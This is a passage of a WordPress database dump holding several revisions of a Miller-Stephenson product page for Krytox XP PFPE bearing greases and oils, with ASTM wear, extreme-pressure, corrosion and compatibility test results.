Final Torque, in lb</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  3,000</td>\r\n<td>                    96</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  3,000</td>\r\n<td>                    51</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/xp-1a5/">1A5</a> oil showed a reduction of 47% in torque over the same viscosity oil with no additive.\r\n\r\nBlock on Ring tests were run per <a href="https://www.astm.org/Standards/D2714.htm">ASTM D2714</a>. The test runs at 72 rpm, with a 100 lb normal load for 5,000 cycles. The test is a line contact configuration. The size of the wear scar on the test block is measured. The\r\nspecimen assembly is partially immersed in the lubricant sample during the test. This method tests the wear prevention properties of the oil.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">0.8</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">0.7</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP 1A5 oil showed a reduction of 12% in wear over the same viscosity oil with no additive.\r\n\r\n<img class="wp-image-3162 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test-800x370.jpg" alt="krytox-xp-scar-test" width="467" height="216" />\r\n\r\nPin and Vee Block Coupons (Large wear scar on left is from oil with no additives; the smaller scar on the right shows the effect of Krytox XP additives.)\r\n\r\n<strong>Bearing Noise</strong>\r\nSolid particles in grease cause bearing noise, and very large particles can lead to early failure of the bearing. Small bearings and electrical motor bearings are commonly plagued by noise. Krytox XP\r\nproducts with soluble additives minimize noise. Various greases were tested to show the effects of particles on noise level in bearings. Any readings above 25 on the low or high band is considered unacceptable for\r\nelectric motor quality. Any amplitude greater than one grid on the oscilloscope is also unacceptable for electric motor quality.\r\n\r\n<img class="alignnone wp-image-3165" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg" alt="krytox-xp-grease-test" width="452" height="177" />\r\n\r\n<strong>Anti-Corrosion Protection</strong>\r\nPerformance of the soluble additives in the Krytox XP line is superior to additives that are commonly used for anti-corrosion protection in PFPE grease.\r\n\r\nThe corrosion prevention performance of oil with the soluble additive was tested against a PFPE oil with no additives using a modified version of <a href="https://www.astm.org/Standards/D665.htm">ASTM D665</a>. Cylindrical C-1018 steel coupons were cleaned and\r\ncoated with oil. They were allowed to drip for 1 hr, and then placed into a water bath that was stirred and held at 80 °C (176 °F). They were examined at routine intervals for corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water normally found in industrial applications, and is somewhat corrosive and similar in action to saltwater.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Time to Initial Corrosion</td>\r\n<td style="text-align: center;" width="180">Final Corrosion Rating at 24 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">Less Than 1 hr</td>\r\n<td style="text-align: center;">Severe Rusting</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">No rusting visible</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nAn additional test was run with corrosion coupons in 80 °C (176 °F) agitated hard water for five weeks with no rusting visible.\r\n\r\nBearing corrosion prevention performance of grease with the soluble additive was tested against a PFPE grease with no additives and against a PFPE grease with standard anti-corrosion additives using the IP-220 (EMCOR) test method. This method uses a double row self-aligning bearing that is packed with grease. It is a dynamic test that runs partially submerged in water for 8 hr, sits for 16 hr, runs again for 8 hr, sits for 16 hr, runs again for 8 hr, and then allowed to sit for an additional 108 hr, which gives a test time of one week. At this time, the bearing is disassembled, and the outer race is examined for rusting. The outer race is rated from 0–5 on a standard rating scale, with 0 having no corrosion and 5 having more than 10% of the surface covered with corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water that normally would be found in industrial applications and similar in corrosion action to saltwater.\r\n\r\n<img class="alignnone wp-image-3166" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg" alt="krytox-xp-final-corrosion-rating" width="414" height="141" />\r\n\r\nCorrosion prevention was also tested by <a href="https://www.astm.org/Standards/B117.htm">ASTM B117</a>, salt spray test. A polished steel test panel that was coated with a 4 mil coating of Krytox XP 2A5 grease and exposed to a 5% salt solution at 95 °C (203 °F) for 100 hr passed with no corrosion forming.\r\n\r\nGrease corrosion prevention was also tested by <a href="https://www.astm.org/Standards/D1743.htm">ASTM D1743</a>. This test uses greased tapered roller bearings that are rotated to spread the grease, and then are dipped in water and stored in a 100% relative humidity\r\nenvironment for two days. The Krytox XP 2A5 grease passed with no rusting.\r\n\r\n<img class="wp-image-3161 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test-800x383.jpg" alt="krytox-xp-bearing-test" width="560" height="268" />\r\n\r\nThe bearing race on the left clearly shows there is no corrosion when Krytox XP additive is present, the bearing in the center shows traces of rust with standard additives, and the bearing on the right shows heavy rusting with no additives.\r\n\r\n<strong>Corrosion-Oxidation Stability Test</strong>\r\n\r\nKrytox XP oils have been tested in the Corrosion-Oxidation Stability test as per Federal Test Method 791C, 5308.7. This method tests the ability of oils to resist oxidation and their tendency to corrode\r\nvarious metals. Metal specimens are suspended in oil at elevated temperature, and air is blown through the mix. After completion, the oil is tested to determine the extent of degradation, and the metal coupons are examined for corrosion.\r\n\r\n<strong>Results on Krytox XP 1A5 oil after 168 hr at 122 °C (250 °F)</strong>\r\nEvaporation loss 1.0%\r\nIncrease in viscosity 1.7%\r\n\r\n&nbsp;\r\n\r\n<strong>Change in weight of metals, mg/cm^2</strong>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Copper</td>\r\n<td width="180">-0.59</td>\r\n</tr>\r\n<tr>\r\n<td>Copper Alloy 932</td>\r\n<td>-0.22</td>\r\n</tr>\r\n<tr>\r\n<td>Cadmium</td>\r\n<td>-0.01</td>\r\n</tr>\r\n<tr>\r\n<td>Aluminum</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Steel</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Magnesium</td>\r\n<td>0.01</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Elastomer Compatibility</strong>\r\nElastomer compatibility screening was conducted on Krytox XP products. Additional testing is being performed to fully characterize if materials are affected by additives in Krytox XP products. The table below lists the percentage of swelling after 168 or 672 hr of exposure.\r\n\r\nMylar® polyester film and Teflon™ fluoropolymer have been tested with no damage, and additional elastomers are currently being tested for compatibility with the additives. Kalrez® perfluoroelastomer parts show the same swell that happens with pure Krytox at high temperatures. Caution should be used with unlisted materials until compatibility testing is completed.\r\n\r\n<img class="alignnone wp-image-3167" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg" alt="krytox-xp-plastic" width="443" height="230" />\r\n\r\n<strong>Storage and Shelf Life</strong>\r\nKrytox XP series lubricants can develop an odor and a slight amber/pinkish color over time. The Krytox XP series has a three-year shelf life and recommended maximum operating temperature of 182 °C (360 °F). Testing has shown that these products retain their anti-rust and anti-wear properties, and perform well past the end of the recommended three-year shelf life. Keep product sealed and store in a cool, dry place.\r\n\r\n[share title="Social Share XP"]\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox XP Oil &amp; Grease" ]\r\n\r\n&nbsp;', 'Krytox XP - Bearing Grease & Oil with Soluble Additives', '', 'inherit', 'closed', 'closed', '', '3160-revision-v1', '', '', '2016-11-29 15:17:48', '2016-11-29 15:17:48', '', 3160, 'https://www.miller-stephenson.com/3160-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3172, 2, '2016-11-29 15:18:12', '2016-11-29 15:18:12', '<h3>Krytox XP Product Information</h3>\r\nKrytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives.\r\n\r\nThe Krytox line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\nKrytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.\r\n\r\nKrytox XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection\r\nagainst corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.\r\n\r\nWhile Krytox oils are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox XP products are new and have not been tested with all materials. It is possible that some reactivity and damage could occur to some materials. Initial testing has shown no problems with Teflon™ fluoropolymer, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. There is some reactivity of the additive with copper, but less so with brass. These additives have not been tested at all temperatures, and degradation of performance could occur at elevated temperatures over a long period of time.<img class="alignnone size-full wp-image-3163" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg" alt="krytox-xp-comparison-chart" width="1388" height="560" />\r\n\r\n<strong>Performance</strong>\r\n\r\nWear testing of the additive was done using standard laboratory tests to demonstrate improved performance. Four Ball Wear tests on oil with the additive compared to oil with no additive were run according to <a href="https://www.astm.org/Standards/D4172.htm">ASTM D4172</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. The wear scar was measured using a microscope. This method tests the wear prevention properties of the oils.\r\n<p style="text-align: left;">Four Ball Wear tests on grease with the additive compared to grease with a typical solid additive were run according to <a href="https://www.astm.org/Standards/D2266.htm">ASTM D2266</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. Krytox XP 1A5 oil showed a reduction of 34% in wear over the same viscosity oil with no additive.</p>\r\n\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  0.44</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  0.29</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThe wear scar was measured using a microscope. This method tests the wear prevention properties of the greases.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Grease</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 225</td>\r\n<td>                 0.42</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2A5</td>\r\n<td>                 0.34</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">2A5</a> grease showed a reduction of 19% in wear over a current grease with the same viscosity oil and with additives to reduce wear and corrosion.\r\n\r\nFour Ball EP tests were run on grease and oil according to <a href="https://www.astm.org/Standards/D2783.htm">ASTM D2783</a> for oil and <a href="https://www.astm.org/Standards/D2596.htm">ASTM D2596</a> for grease. This method tests the extreme pressure properties of the oil or additive and its ability to carry heavy loads.\r\n\r\n<img class="alignnone size-full wp-image-3164" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg" alt="krytox-xp-load-wear-index" width="682" height="176" />\r\n\r\nWater washout of grease from a bearing was tested by <a href="https://www.astm.org/Standards/D1264.htm">ASTM D1264</a> at 79 °C (175 °F).\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219">Test Grease</td>\r\n<td style="text-align: center;" width="180">Grease Removed</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Krytox XP 2A5</td>\r\n<td style="text-align: center;">0.25%</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nPin and Vee Block tests were conducted according to <a href="https://www.astm.org/Standards/D3233.htm">ASTM D3233</a>. The test is a load to failure test that uses progressive loading on Vee blocks that squeeze a shaft rotating at 290 rpm. The test terminates when the shaft seizes and breaks a shear pin or the machine reaches its top loading of 3,000 lb on the load pressure gauge. The test pieces are submerged in oil. This method tests the extreme pressure properties of the oil or additive. These tests were run starting at room temperature.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">Maximum Load Reached,                      lb</td>\r\n<td width="180">       Final Torque, in lb</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  3,000</td>\r\n<td>                    96</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  3,000</td>\r\n<td>                    51</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/xp-1a5/">1A5</a> oil showed a reduction of 47% in torque over the same viscosity oil with no additive.\r\n\r\nBlock on Ring tests were run per <a href="https://www.astm.org/Standards/D2714.htm">ASTM D2714</a>. The test runs at 72 rpm, with a 100 lb normal load for 5,000 cycles. The test is a line contact configuration. The size of the wear scar on the test block is measured. The\r\nspecimen assembly is partially immersed in the lubricant sample during the test. This method tests the wear prevention properties of the oil.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">0.8</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">0.7</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP 1A5 oil showed a reduction of 12% in wear over the same viscosity oil with no additive.\r\n\r\n<img class="wp-image-3162 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test-800x370.jpg" alt="krytox-xp-scar-test" width="467" height="216" />\r\n\r\nPin and Vee Block Coupons (Large wear scar on left is from oil with no additives; the smaller scar on the right shows the effect of Krytox XP additives.)\r\n\r\n<strong>Bearing Noise</strong>\r\nSolid particles in grease cause bearing noise, and very large particles can lead to early failure of the bearing. Small bearings and electrical motor bearings are commonly plagued by noise. Krytox XP\r\nproducts with soluble additives minimize noise. Various greases were tested to show the effects of particles on noise level in bearings. Any readings above 25 on the low or high band is considered unacceptable for\r\nelectric motor quality. Any amplitude greater than one grid on the oscilloscope is also unacceptable for electric motor quality.\r\n\r\n<img class="alignnone wp-image-3165" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg" alt="krytox-xp-grease-test" width="452" height="177" />\r\n\r\n<strong>Anti-Corrosion Protection</strong>\r\nPerformance of the soluble additives in the Krytox XP line is superior to additives that are commonly used for anti-corrosion protection in PFPE grease.\r\n\r\nThe corrosion prevention performance of oil with the soluble additive was tested against a PFPE oil with no additives using a modified version of <a href="https://www.astm.org/Standards/D665.htm">ASTM D665</a>. Cylindrical C-1018 steel coupons were cleaned and\r\ncoated with oil. They were allowed to drip for 1 hr, and then placed into a water bath that was stirred and held at 80 °C (176 °F). They were examined at routine intervals for corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water normally found in industrial applications, and is somewhat corrosive and similar in action to saltwater.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Time to Initial Corrosion</td>\r\n<td style="text-align: center;" width="180">Final Corrosion Rating at 24 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">Less Than 1 hr</td>\r\n<td style="text-align: center;">Severe Rusting</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">No rusting visible</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nAn additional test was run with corrosion coupons in 80 °C (176 °F) agitated hard water for five weeks with no rusting visible.\r\n\r\nBearing corrosion prevention performance of grease with the soluble additive was tested against a PFPE grease with no additives and against a PFPE grease with standard anti-corrosion additives using the IP-220 (EMCOR) test method. This method uses a double row self-aligning bearing that is packed with grease. It is a dynamic test that runs partially submerged in water for 8 hr, sits for 16 hr, runs again for 8 hr, sits for 16 hr, runs again for 8 hr, and then allowed to sit for an additional 108 hr, which gives a test time of one week. At this time, the bearing is disassembled, and the outer race is examined for rusting. The outer race is rated from 0–5 on a standard rating scale, with 0 having no corrosion and 5 having more than 10% of the surface covered with corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water that normally would be found in industrial applications and similar in corrosion action to saltwater.\r\n\r\n<img class="alignnone wp-image-3166" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg" alt="krytox-xp-final-corrosion-rating" width="414" height="141" />\r\n\r\nCorrosion prevention was also tested by <a href="https://www.astm.org/Standards/B117.htm">ASTM B117</a>, salt spray test. A polished steel test panel that was coated with a 4 mil coating of Krytox XP 2A5 grease and exposed to a 5% salt solution at 95 °C (203 °F) for 100 hr passed with no corrosion forming.\r\n\r\nGrease corrosion prevention was also tested by <a href="https://www.astm.org/Standards/D1743.htm">ASTM D1743</a>. This test uses greased tapered roller bearings that are rotated to spread the grease, and then are dipped in water and stored in a 100% relative humidity\r\nenvironment for two days. The Krytox XP 2A5 grease passed with no rusting.\r\n\r\n<img class="wp-image-3161 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test-800x383.jpg" alt="krytox-xp-bearing-test" width="560" height="268" />\r\n\r\nThe bearing race on the left clearly shows there is no corrosion when Krytox XP additive is present, the bearing in the center shows traces of rust with standard additives, and the bearing on the right shows heavy rusting with no additives.\r\n\r\n<strong>Corrosion-Oxidation Stability Test</strong>\r\n\r\nKrytox XP oils have been tested in the Corrosion-Oxidation Stability test as per Federal Test Method 791C, 5308.7. This method tests the ability of oils to resist oxidation and their tendency to corrode\r\nvarious metals. Metal specimens are suspended in oil at elevated temperature, and air is blown through the mix. After completion, the oil is tested to determine the extent of degradation, and the metal coupons are examined for corrosion.\r\n\r\n<strong>Results on Krytox XP 1A5 oil after 168 hr at 122 °C (250 °F)</strong>\r\nEvaporation loss 1.0%\r\nIncrease in viscosity 1.7%\r\n\r\n&nbsp;\r\n\r\n<strong>Change in weight of metals, mg/cm^2</strong>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Copper</td>\r\n<td width="180">-0.59</td>\r\n</tr>\r\n<tr>\r\n<td>Copper Alloy 932</td>\r\n<td>-0.22</td>\r\n</tr>\r\n<tr>\r\n<td>Cadmium</td>\r\n<td>-0.01</td>\r\n</tr>\r\n<tr>\r\n<td>Aluminum</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Steel</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Magnesium</td>\r\n<td>0.01</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Elastomer Compatibility</strong>\r\nElastomer compatibility screening was conducted on Krytox XP products. Additional testing is being performed to fully characterize if materials are affected by additives in Krytox XP products. The table below lists the percentage of swelling after 168 or 672 hr of exposure.\r\n\r\nMylar® polyester film and Teflon™ fluoropolymer have been tested with no damage, and additional elastomers are currently being tested for compatibility with the additives. Kalrez® perfluoroelastomer parts show the same swell that happens with pure Krytox at high temperatures. Caution should be used with unlisted materials until compatibility testing is completed.\r\n\r\n<img class="alignnone wp-image-3167" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg" alt="krytox-xp-plastic" width="443" height="230" />\r\n\r\n<strong>Storage and Shelf Life</strong>\r\nKrytox XP series lubricants can develop an odor and a slight amber/pinkish color over time. The Krytox XP series has a three-year shelf life and recommended maximum operating temperature of 182 °C (360 °F). Testing has shown that these products retain their anti-rust and anti-wear properties, and perform well past the end of the recommended three-year shelf life. Keep product sealed and store in a cool, dry place.\r\n\r\n[share title="Social Share XP"]\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox XP Oil &amp; Grease" ]\r\n\r\n&nbsp;', 'Krytox XP - Bearing Grease & Oil with Soluble Additives', '', 'inherit', 'closed', 'closed', '', '3160-revision-v1', '', '', '2016-11-29 15:18:12', '2016-11-29 15:18:12', '', 3160, 'https://www.miller-stephenson.com/3160-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3173, 2, '2016-11-29 15:19:34', '2016-11-29 15:19:34', '<h3>Krytox XP Product Information</h3>\n<p>Krytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives.</p>\n<p>The Krytox line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.</p>\n<p>Krytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.</p>\n<p>Krytox XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection<br />\nagainst corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.</p>\n<p>While Krytox oils are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox XP products are new and have not been tested with all materials. It is possible that some reactivity and damage could occur to some materials. Initial testing has shown no problems with Teflon™ fluoropolymer, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. There is some reactivity of the additive with copper, but less so with brass. These additives have not been tested at all temperatures, and degradation of performance could occur at elevated temperatures over a long period of time.<img class="alignnone size-full wp-image-3163" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg" alt="krytox-xp-comparison-chart" width="1388" height="560" /></p>\n<p><strong>Performance</strong></p>\n<p>Wear testing of the additive was done using standard laboratory tests to demonstrate improved performance. Four Ball Wear tests on oil with the additive compared to oil with no additive were run according to <a href="https://www.astm.org/Standards/D4172.htm">ASTM D4172</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. The wear scar was measured using a microscope. This method tests the wear prevention properties of the oils.</p>\n<p style="text-align: left;">Four Ball Wear tests on grease with the additive compared to grease with a typical solid additive were run according to <a href="https://www.astm.org/Standards/D2266.htm">ASTM D2266</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. Krytox XP 1A5 oil showed a reduction of 34% in wear over the same viscosity oil with no additive.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td width="180">     Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td>                  0.44</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td>                  0.29</td>\n</tr>\n</tbody>\n</table>\n<p>The wear scar was measured using a microscope. This method tests the wear prevention properties of the greases.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Grease</td>\n<td width="180">     Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 225</td>\n<td>                 0.42</td>\n</tr>\n<tr>\n<td>Krytox XP 2A5</td>\n<td>                 0.34</td>\n</tr>\n</tbody>\n</table>\n<p>Krytox XP <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">2A5</a> grease showed a reduction of 19% in wear over a current grease with the same viscosity oil and with additives to reduce wear and corrosion.</p>\n<p>Four Ball EP tests were run on grease and oil according to <a href="https://www.astm.org/Standards/D2783.htm">ASTM D2783</a> for oil and <a href="https://www.astm.org/Standards/D2596.htm">ASTM D2596</a> for grease. This method tests the extreme pressure properties of the oil or additive and its ability to carry heavy loads.</p>\n<p><img class="alignnone size-full wp-image-3164" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg" alt="krytox-xp-load-wear-index" width="682" height="176" /></p>\n<p>Water washout of grease from a bearing was tested by <a href="https://www.astm.org/Standards/D1264.htm">ASTM D1264</a> at 79 °C (175 °F).</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td style="text-align: center;" width="219">Test Grease</td>\n<td style="text-align: center;" width="180">Grease Removed</td>\n</tr>\n<tr>\n<td style="text-align: center;">Krytox XP 2A5</td>\n<td style="text-align: center;">0.25%</td>\n</tr>\n</tbody>\n</table>\n<p>Pin and Vee Block tests were conducted according to <a href="https://www.astm.org/Standards/D3233.htm">ASTM D3233</a>. The test is a load to failure test that uses progressive loading on Vee blocks that squeeze a shaft rotating at 290 rpm. The test terminates when the shaft seizes and breaks a shear pin or the machine reaches its top loading of 3,000 lb on the load pressure gauge. The test pieces are submerged in oil. This method tests the extreme pressure properties of the oil or additive. These tests were run starting at room temperature.</p>\n<table class=" aligncenter" width="579">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td width="180">Maximum Load Reached,                      lb</td>\n<td width="180">       Final Torque, in lb</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td>                  3,000</td>\n<td>                    96</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td>                  3,000</td>\n<td>                    51</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p>Krytox XP <a href="https://www.miller-stephenson.com/product/xp-1a5/">1A5</a> oil showed a reduction of 47% in torque over the same viscosity oil with no additive.</p>\n<p>Block on Ring tests were run per <a href="https://www.astm.org/Standards/D2714.htm">ASTM D2714</a>. The test runs at 72 rpm, with a 100 lb normal load for 5,000 cycles. The test is a line contact configuration. The size of the wear scar on the test block is measured. The<br />\nspecimen assembly is partially immersed in the lubricant sample during the test. This method tests the wear prevention properties of the oil.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td style="text-align: center;" width="180">Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td style="text-align: center;">0.8</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td style="text-align: center;">0.7</td>\n</tr>\n</tbody>\n</table>\n<p>Krytox XP 1A5 oil showed a reduction of 12% in wear over the same viscosity oil with no additive.</p>\n<p><img class="wp-image-3162 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test-800x370.jpg" alt="krytox-xp-scar-test" width="467" height="216" /></p>\n<p>Pin and Vee Block Coupons (Large wear scar on left is from oil with no additives; the smaller scar on the right shows the effect of Krytox XP additives.)</p>\n<p><strong>Bearing Noise</strong><br />\nSolid particles in grease cause bearing noise, and very large particles can lead to early failure of the bearing. Small bearings and electrical motor bearings are commonly plagued by noise. Krytox XP<br />\nproducts with soluble additives minimize noise. Various greases were tested to show the effects of particles on noise level in bearings. Any readings above 25 on the low or high band is considered unacceptable for<br />\nelectric motor quality. Any amplitude greater than one grid on the oscilloscope is also unacceptable for electric motor quality.</p>\n<p><img class="alignnone wp-image-3165" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg" alt="krytox-xp-grease-test" width="452" height="177" /></p>\n<p><strong>Anti-Corrosion Protection</strong><br />\nPerformance of the soluble additives in the Krytox XP line is superior to additives that are commonly used for anti-corrosion protection in PFPE grease.</p>\n<p>The corrosion prevention performance of oil with the soluble additive was tested against a PFPE oil with no additives using a modified version of <a href="https://www.astm.org/Standards/D665.htm">ASTM D665</a>. Cylindrical C-1018 steel coupons were cleaned and<br />\ncoated with oil. They were allowed to drip for 1 hr, and then placed into a water bath that was stirred and held at 80 °C (176 °F). They were examined at routine intervals for corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water normally found in industrial applications, and is somewhat corrosive and similar in action to saltwater.</p>\n<table class=" aligncenter" width="579">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td style="text-align: center;" width="180">Time to Initial Corrosion</td>\n<td style="text-align: center;" width="180">Final Corrosion Rating at 24 hr</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td style="text-align: center;">Less Than 1 hr</td>\n<td style="text-align: center;">Severe Rusting</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td style="text-align: center;">None</td>\n<td style="text-align: center;">No rusting visible</td>\n</tr>\n</tbody>\n</table>\n<p>An additional test was run with corrosion coupons 